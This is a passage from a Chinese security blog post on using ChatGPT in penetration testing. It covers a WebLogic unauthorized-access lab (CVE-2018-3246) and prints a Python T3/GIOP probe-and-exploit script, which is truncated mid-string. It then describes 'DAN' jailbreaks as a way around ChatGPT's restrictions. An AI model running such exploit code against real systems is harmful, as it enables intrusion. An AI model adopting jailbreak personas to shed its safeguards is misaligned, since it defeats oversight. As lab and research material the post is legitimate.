<h2 id="未授权访问"><a href="#未授权访问" class="headerlink" title="未授权访问"></a>未授权访问</h2><p>本次使用的靶场为weblogic 未授权访问 （CVE-2018-3246）</p>
<p>简单介绍：</p>
<p><img src="https://s2.loli.net/2023/03/05/9C4vfVNhYQwJR3x.png"></p>
<p>和voluvulfocus简介基本一致:</p>
<p><img src="https://s2.loli.net/2023/03/05/1THpWaikY57s9dy.png"></p>
<p>利用方式：</p>
<p><img src="https://s2.loli.net/2023/03/05/vmYjSQ9JHLhDuPa.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line">import socket</span><br><span class="line">import binascii</span><br><span class="line"></span><br><span class="line">host = &#x27;target_host&#x27;</span><br><span class="line">port = 7001</span><br><span class="line"></span><br><span class="line">sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">sock.connect((host, port))</span><br><span class="line"></span><br><span class="line">header = &#x27;t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\n\n&#x27;</span><br><span class="line">payload = &#x27;47494f50010200020000000400000003000000000000000131302e31302e31302e31310000090c0000000b4a4d7856616c75650000000000000000000000000000000000000000000000000000000000000000000000000000000baba040000000001020000000000000a0000000000000002000000004f4a4d4e31687474700005454e565f4c4f43414c2d4441544100000100000000000000000a00000032000000020000000c31302e31302e31302e3131000000000000000000000000000000000000&#x27;</span><br><span class="line"></span><br><span class="line">payload = binascii.a2b_hex(payload)</span><br><span class="line">pkt = header + str(len(payload)).rjust(8, &#x27;0&#x27;) + payload</span><br><span class="line"></span><br><span class="line">sock.send(pkt)</span><br><span class="line"></span><br><span class="line">resp = sock.recv(1024)</span><br><span class="line">if &#x27;HELO&#x27; in resp:</span><br><span class="line">    print &#x27;[+] T3 protocol is enabled on the target&#x27;</span><br><span class="line">else:</span><br><span class="line">    print &#x27;[-] T3 protocol is not enabled on the target&#x27;</span><br><span class="line">    sock.close()</span><br><span class="line">    exit()</span><br><span class="line"></span><br><span class="line">header = &#x27;t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\n\n&#x27;</span><br><span class="line">payload = &#x27;47494f500102000c0000000400000003000000000000000f31302e31302e31302e3131000000&#x27; + \</span><br><span class="line">          &#x27;090c0000000b4a4d7856616c7565000000000000000000000000000000000000000000000000&#x27; + \</span><br><span class="line">          &#x27;0000000000000000000000000000000000000000000000baba04000000000c00000000000000&#x27; + \</span><br><span class="line">          &#x27;020000000000000a0000000000000002000000004f4a4d4e31687474700005454e565f4c4f43</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>chatgpt又一次证明了只要有好的文本提示和漏洞细节，它就可以生成可用的漏洞利用代码。</p>
<h1 id="对chatgpt本身的渗透"><a href="#对chatgpt本身的渗透" class="headerlink" title="对chatgpt本身的渗透"></a>对chatgpt本身的渗透</h1><blockquote>
<p>Never trust user input.</p>
<p>Data must be validated as it crosses the boundary between untrusted and trusted environments.</p>
</blockquote>
<h2 id="DAN"><a href="#DAN" class="headerlink" title="DAN"></a>DAN</h2><p>参考<a target="_blank" rel="noopener" href="https://medium.com/seeds-for-the-future/tricking-chatgpt-do-anything-now-prompt-injection-a0f65c307f6b">Tricking ChatGPT: Do Anything Now Prompt Injection
</a>与<a target="_blank" rel="noopener" href="https://www.reddit.com/r/ChatGPT/comments/zlcyr9/dan_is_my_new_friend/">DAN is my new friend
</a>以及前文中对chatgpt的绕过，我们可以知道openai在chatgpt内部设置的限制是可以被绕过的，而绕过的最终目的，就是产生DAN(do anything now)。</p>
<p>DAN指chatgpt的do anything now版本，也即是一个抛却了一切openai对其设置的限制的chatgpt版本。在这个版本中它打破了我们无数次碰壁的道德与法律围栏。</p>

            </div>
        
        <footer class="article-footer">
        </footer>
    </div>
</article>


    
<nav id="article-nav">
    
    
        <a href="/2022/08/23/OSCP%E4%B9%8B%E8%B7%AF/%E5%86%99%E5%9C%A8%E4%B8%80%E5%88%87%E4%B9%8B%E5%89%8D/" id="article-nav-older" class="article-nav-link-wrap">
            <strong class="article-nav-caption">下一篇</strong>
            <div class="article-nav-title">写在一切之前——关于OSCP|PEN-200</div>
        </a>
    
</nav>





    
    




<!-- baidu url auto push script -->
<script type="text/javascript">
    !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=window.location.href,o=document.referrer;if(!e.test(r)){var n="//api.share.baidu.com/s.gif";o?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var t=new Image;t.src=n}}(window);
</script>     
</section>
        </div>
        <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            CiaoFox &copy; 2023 
            <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-nd/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/80x15.png" /></a>
            <br> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>. Theme - <a target="_blank" rel="noopener" href="https://github.com/zthxxx/hexo-theme-Wikitten">wikitten</a>
            
                <br>
                <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span></span>
                &nbsp;|&nbsp;
                <span id="busuanzi_container_site_pv"><i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span></span>
            
        </div>
    </div>
</footer>

        

    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    
        <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true,
            TeX: {
                equationNumbers: {
                  autoNumber: 'AMS'
                }
            }
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


    </div>
</body>
</html>